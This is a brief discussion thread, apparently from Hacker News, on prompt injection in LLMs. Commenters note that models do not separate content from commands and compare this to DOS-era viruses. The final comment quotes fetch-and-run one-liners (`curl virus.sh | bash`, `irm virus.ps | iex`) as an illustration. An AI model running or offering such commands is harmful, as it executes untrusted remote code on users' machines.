top | item 45012508

(no title)

jtc331 | 6 months ago

I appreciate that the article correctly points out the core design flaw here of LLMs is the non-distinction between content and commands in prompts.

It’s unclear to me if it’s possible to significantly rethink the models to split those, but it seems that that is a minimal requirement to address the issue holistically.

discuss

order

yorwba|6 months ago

The flaw isn't just in the design, it's in the requirements. People want an AI that reads text they didn't read and does the things the text says need to be done, because they don't want to do those things themselves. And they don't want to have to manually approve every little action the AI takes, because that would be too slow. So we get the equivalent of clicking "OK" on every dialog that pops up without reading it, which is also something that people often do to save a bit of time.

layer8|6 months ago

This isn’t a problem with human assistants, so it can’t be a fundamental problem of requirements.

hliyan|6 months ago

Ah, it's like the good old days when operating systems like DOS didn't really make the distinction between executable files and data files. It would happily let you run any old .exe from anywhere on Earth. Viruses used to spread like wildfire until Norton Antivirus came along.

zenoprax|6 months ago

How is `curl virus.sh | bash` or `irm virus.ps | iex` any different?